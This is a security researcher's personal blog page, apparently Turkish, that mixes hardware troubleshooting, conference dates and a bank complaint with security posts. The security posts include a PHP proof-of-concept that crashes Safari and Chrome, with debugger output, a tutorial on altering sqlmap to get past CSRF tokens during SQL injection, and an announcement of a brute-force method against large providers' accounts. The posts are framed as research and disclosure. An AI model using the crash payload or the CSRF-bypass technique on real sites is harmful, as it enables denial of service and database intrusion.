Featured Posts

<< >>

Critical Kernel-Power Error 41

Merhabalar arkadaşlar, Yaklaşık 2 aydır masa üstü cihazımda Kernel-Power hatası alıyor ve cihaz yeniden başlıyordu. Denemediğim şey kalmadı cihaz üzerindeki anakart extreme edition olduğu için overclock panele sahip (asus x99) microsoft

Etkinlik ve Konferanslar

Merhaba arkadaşlar, Şubat, Mart ve Nisan ayı içerisinde bazı sunumlara katılamadım. sağlık ve iş gibi sıkıntılarından dolayı katılamadığım konferanslar için kusura bakmayın. Mayıs ayından itibaren kaldığımız yerden tüm hızıyla sunumlara

Python hakkında herşey

Merhaba arkadaşlar, Python öğrenmek isteyenlerin faydalanabileceği güzel bir kaynak. Türkçe olması yeni başlayanlar için en büyük avantaj. http://www.pythondersleri.com/

Garanti Bankası Rezil Hizmetinin Ses Kayıt’ı

Garanti Bankası Rezil Hizmeti.Resmen Vodafone ve Avea Kullanmayın dedi.       burada müşteri temsilcisinin göz ardı ettiği şey, suçlunun veya sorunun kimden kaynaklı olduğunun araştırılması ve giderilmesi konusunda çözüm

Mac OS X , iOS Chrome & Safari web browsers heap corruption bug

I think heap verify mechanism of Safari prevents the actual crash. PoC 1 –> http://ibrahimbalic.com/ios2/ PoC 2 –> http://ibrahimbalic.com/nets/ PHP code: <?php ob_start(“ob_gzhandler”); $ax = str_repeat(“aa/aa/./a”,2000000); ?> <html> <head> </head>

Critical Kernel-Power Error 41

Merhabalar arkadaşlar,

kernel-power.41

Yaklaşık 2 aydır masa üstü cihazımda Kernel-Power hatası alıyor ve cihaz yeniden başlıyordu. Denemediğim şey kalmadı cihaz üzerindeki anakart extreme edition olduğu için overclock panele sahip (asus x99) microsoft sitesindede seneryolardan birinde overclock yapılanmasından kaynaklanabileceği söyleniyordu tüm konfigürasyonumu bozup default’a çektik ayarları fakat nafile, cihaz kapanmaya devam etti.

https://support.microsoft.com/en-us/kb/2028504

 

Sonra ki aşamada ısıdan şüphelendik su soğutma sistemi ilk deneyim edişimdi acaba dedim bunla alakalı olabilir mi, cpu üzerindeki soğutmayı terse çevirdik ve fan çıkışlarını değiştirdik. ters düz ettik yine çözüm üretemedik.

 

Son olarak power-supply den şüğhelenerek performans sıkıntısı olabileceğini düşündüm üzerinde 2 sli serisi ekran kartı olduğu için güç yetmiyor diye düşündük ekran kartlarından birini söktüm yine çözüm olmadı.

 

sonra internet üzerinden bir sürü araştırma yaptım, bir çok kişinin bu sorunu yaşadığını ama net bir çözüm önerisi olmadığını gördüm taki şuradaki elemanı görene kadar (kendisine Türkiye’ye geldiğinde bir yemek ısmarlayabilirim o derece)

 

http://www.tomshardware.co.uk/answers/id-2042905/asus-rampage-iii-extreme-overclocking-failed-error.html#12853678

 

Amca oğlunun iddasını mantıklı geldi, çünkü harici ses kartı kullanıyordum ( logitech h600 wifi) ve herif çözmüş olayı sorunun kaynağı onboard ses kartı driver’ı kaldırıp güncel driver’ı kurunca sorun ortadan kalkıyor. Umarım yaşamazsınız ama yaşarsanız bu yazı burada kalsın benim gibi aylarca kafa yormayın ( :

 

 

Etkinlik ve Konferanslar

Merhaba arkadaşlar,

Şubat, Mart ve Nisan ayı içerisinde bazı sunumlara katılamadım. sağlık ve iş gibi sıkıntılarından dolayı katılamadığım konferanslar için kusura bakmayın. Mayıs ayından itibaren kaldığımız yerden tüm hızıyla sunumlara devam edeceğim.

4 Mayıs 2015, Kocaeli Üniversitesi – Kocaeli

6 Mayıs 2015, Osmangazi Üniversitesi – Eskişehir

8 Mayıs 2015, Turgut Özal Üniversitesi – Ankara

13 Mayıs 2015, Namık Kemal Üniversitesi – Çorlu

15 Mayıs 2015, İzmir Gediz Üniversitesi – İzmir

Neden Siber Silahlar” başlıklı sunumumu gerçekleştireceğim.

 

Konferans ve Etkinlik ile ilgili talep ve davetler için ibrahimbalic@hotmail.com adresine e-mail atabilirsiniz arkadaşlar.

 

İyi çalışmalar

İbrahim

Python hakkında herşey

Merhaba arkadaşlar,

Python öğrenmek isteyenlerin faydalanabileceği güzel bir kaynak. Türkçe olması yeni başlayanlar için en büyük avantaj.

http://www.pythondersleri.com/

Garanti Bankası Rezil Hizmetinin Ses Kayıt’ı

Garanti Bankası Rezil Hizmeti.Resmen Vodafone ve Avea Kullanmayın dedi.

 

 

 

burada müşteri temsilcisinin göz ardı ettiği şey, suçlunun veya sorunun kimden kaynaklı olduğunun araştırılması ve giderilmesi konusunda çözüm üretici merci olarak benim Garanti bankasını müşteri temsilcisinin ise beni görüyor olmasıdır. Sorunun çözülüp hizmete dönüştürülmesi konusunda muhattabım garanti bankasıdır. Fakat ilgili yetkili kendisini haklı olduğuna o kadar inandırmış ki sanarsın mağdur olan garanti ve sebebi benim allah’ta benim belamı versin… Neyse hatalıysam email atın ( :

Mac OS X , iOS Chrome & Safari web browsers heap corruption bug

I think heap verify mechanism of Safari prevents the actual crash.

PoC 1 –> http://ibrahimbalic.com/ios2/

PoC 2 –> http://ibrahimbalic.com/nets/

PHP code:

<?php
ob_start(“ob_gzhandler”);
$ax = str_repeat(“aa/aa/./a”,2000000);
?>
<html>
<head>
</head>
<body>
<a http://<?php echo $ax;?>” id=”test”>test</a>
</body>
</html>

 

 

Crash:

Expected Results:
0:000:x86> .frame /r
00 0042e294 60b8cdfc CoreFoundation!CFStringEncodingSetForceASCIICompatibility+0x90
eax=00000000 ebx=06fb2d90 ecx=00000061 edx=00000000 esi=4bc90020 edi=0ab60c40
eip=60b982d7 esp=0042e284 ebp=0042e294 iopl=0 nv up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206
CoreFoundation!CFStringEncodingSetForceASCIICompatibility+0x90:
60b982d7 66890c42 mov word ptr [edx+eax*2],cx ds:002b:00000000=????
0:000:x86> ub .
CoreFoundation!CFStringEncodingSetForceASCIICompatibility+0x73:
60b982ba c3 ret
60b982bb 33c0 xor eax,eax
60b982bd 3944240c cmp dword ptr [esp+0Ch],eax
60b982c1 7e1f jle CoreFoundation!CFStringEncodingSetForceASCIICompatibility+0x9b (60b982e2)
60b982c3 8b4c2404 mov ecx,dword ptr [esp+4]
60b982c7 0fb60c08 movzx ecx,byte ptr [eax+ecx]
60b982cb 668b0c4dc898c260 mov cx,word ptr CoreFoundation!_CFDefaultEightBitStringEncoding+0x1a8 (60c298c8)[ecx*2]
60b982d3 8b542408 mov edx,dword ptr [esp+8]

 

Sqlmap ile CSRF Bypass

Merhabalar,

 

Birçok güvenlik araştırmacısı penetrasyon testleri yaparken, zafiyet tespit edebilmek için veya tespit ettikleri zafiyetleri exploit edebilmek adına çeşitli araçlardan faydalanmaktadır. Bu araçlar genel olarak işlemleri otomatik hale getiriyor olsalar da kısmen yetersiz kaldıkları durumlar veya güvenlik denetimlerine takıldıkları zamanlar vardır. Bu başlık altında SQLMap aracını kullanarak CSRF(Cross-site Request Forgery) için alınmış bir dizi önlemi bypass etmenin yollarına deyineceğim.

ttttaaa

 

Burada kullanılan CSRF mekanizmasının çalışma anatomisine göz atacak olursak, Server’ın, Client için gönderdiği cevapta (response) sayfa içerisindeki formlar için random bir token oluşturulmuş. Server Client’tan gelecek olan her istek için bu token değerini beklemektedir. Eğer bu token gönderilirse, Istek(request) için Cevap(response) verilecektir. Sayfa her yenilendiğinde (her request için) o sayfaya özel uniq bir token oluşturulmakta ve yapılacak istek için bu token beklenmektedir.

 

SQLMap aracının bu seneryo/mekanizma içerisinde kullanacağımızı düşünürsek, yapılacak atack’ın başarısız olacağını hemen anlayabiliriz.SQLMap’ın bu seneryo içerisinde server için yapacağı her istek içerisinde server için bir token göndermesi gerekmektedir. Bu tip bir durum için SQLMap içerisinde yapılacak ufak bir kaç değişiklik ile SQLMap için bu yetenek kazandırılabilinir.

Hedefimiz SQLMap aracığını çalışma mekanizmasını değiştirmek suretiyle yapacağı her istek(request) öncesinde Server’dan ilgili token değerini alıp, yapacağı bir sonraki istek(request) içerisinde bu token’ı kullanması. Bu sebeple bulmamız gereken öncelikli şey SQLMap aracının istek yapmış olduğu modül.

https://github.com/sqlmapproject/sqlmap/blob/master/lib/request/connect.py

SQLMap aracı biraz incelediğimizde yapılan her istek için connect.py içerisinde bulunan getPage functionını kullandığını açıkça görebilmekteyiz. Seneryomuza göre yapılacak her işlem için SQLMap aracının server ile iletişim sağlaması ise bu function içerisinde değişiklik yapmamız bizim için yeterli olacaktır.

Seneryomuza göre şimdiki hedefimiz server’ın client için oluşturduğu token’ı sayfa içerisinde tespit etmek. Bunu anlamak için giden trafiği veya sayfa içerisinde source code’un incelenmesi faydalı olacaktır.

Bizim örneğimizde __RequestVerificationToken değeri içerisinde gidip geldiğini görüyoruz.

 

fffkret

Server’ın client için oluşturduğu random token’ın tutulduğu input değerini tespit ettik, Şimdiki hedefimiz sunucuya kendi cookie değerimiz ile istekte(request) bulunup, bize göndermiş olduğu cevap(response) içerisinde __RequestVerificationToken değerini alıp, SQLMap içerisinde gönderilecek post değeri içerisine yerleştirmek.

connectpy

 

Yukarıda görmüş olduğunuz gibi connect.py içerisinde getpage functionında değişiklikler yaptım, 1. aşama olarak server için kendi cookie değerimi set ediyorum ve 2. aşamada bu cookie değeri ile server’a istek yapıyorum(request). 2. aşamada server’ın bana göndermiş olduğu cevap(response) içerisinde aradığım __RequestVerificationToken değerini parçalıyorum(parse ediyorum). Bu değeri alıp 4 aşamada SQLMap’in post parametresinin içerisindeki csrfid değişkeni ile server’dan aldığım değişkeni yer değiştiriyorum. Bu sayede SQLMap yapacağı her istek içerisinde server’a requestverification token yollamış oluyor.
ffffa

Sqlmap içerisinde __RequestVerificationToken parametresinin değerini csrfid olarak verdiğim için her istekte alınan request token burayla yer değiştirilecektir.

Bu mantık ile farklı uygulamalarda farklı denetimleri bypass edebilirsiniz.

Herkese iyi çalışmalar dilerim

İbrahim

Baliç Bilişim Sitesi ve Eğitim İçerikleri Yenilendi.

Merhabalar,

Baliç Bilişim’in websitesi ve eğitim içerikleri yenilendi.

www.balicbilisim.com

Windows Directory Bug

Hi Guys,

I’d like to share a weird story with you.

Today, I found this interesting bug/issue in Windows OS. earlier I tested on Windows 8.1(x64), Windows 7(x64) and Windows Sever 2008 R2 (x64). I think they are present in all versions of its windows OS.

However Im not certain why this issue occured but I think it minght be related with NTFS.

Due to this issue the created folders are unable to be deleted.

mkdir “test /. /test”

windows_1

windows_2

windows_3

windows_4

if you created a file in folder, same file gets created in both folder also if any one of the folder is deleted, remaing file get corrupted.

windows_5

windows_6

Siber Güvenlik Konferansı 2014 İstanbul

https://lh6.googleusercontent.com/-rVac6pQsrRE/UoyzBYokSbI/AAAAAAAADmQ/-V5xJYnhVPQ/w140-h133-p/SGD-LOGO-RGB.jpg
Siber Güvenlik Konferansı 2014 İstanbul

Geçtiğimiz yıllarda dünyaya damgası vuran ve siber dünyadan gelebilecek tehditlere karşı önemini daha çok hissettiren siber güvenlik, siber casus yetiştirme politikaları, siber savaşlar ve bu alana yönelik olarak ülkelerin bütçelerinden ayırdıkları hatırı sayılır oranlara ulaşan rakamlar, siber güvenlik kavramını bireysel, kurumsal ve ülke güvenliği açısından kritik öneme kavuşturmuştur. Siber Güvenlik Derneği tarafından düzenlenecek olan Siber Güvenlik Konferansı bu eksendeki soru ve sorunlara çözüm önerileri sunmayı hedeflemektedir.

http://www.siberguvenlikkonferansi.org/

 

New generation brute force attacks

Hi guys,

Soon I will be sharing a method for brute force attacks. I tested on most of the big companies(Apple, Google, Microsoft etc.) which it worked well. I tried on over 20.000+ times password on any account and there seemed to be no problem occurring.

I have reported this issues to Google and Apple so i will be sharing these information’s when I get a reply from those companies and when its fixed.(i will not report to microsoft because they gave a bad experience to me in the past..)

I believe that many other company’s system has the same issue which must be fixed soon as possible.

For now I only have a response from google, i will publish it when i hear from apple.
googlePermissions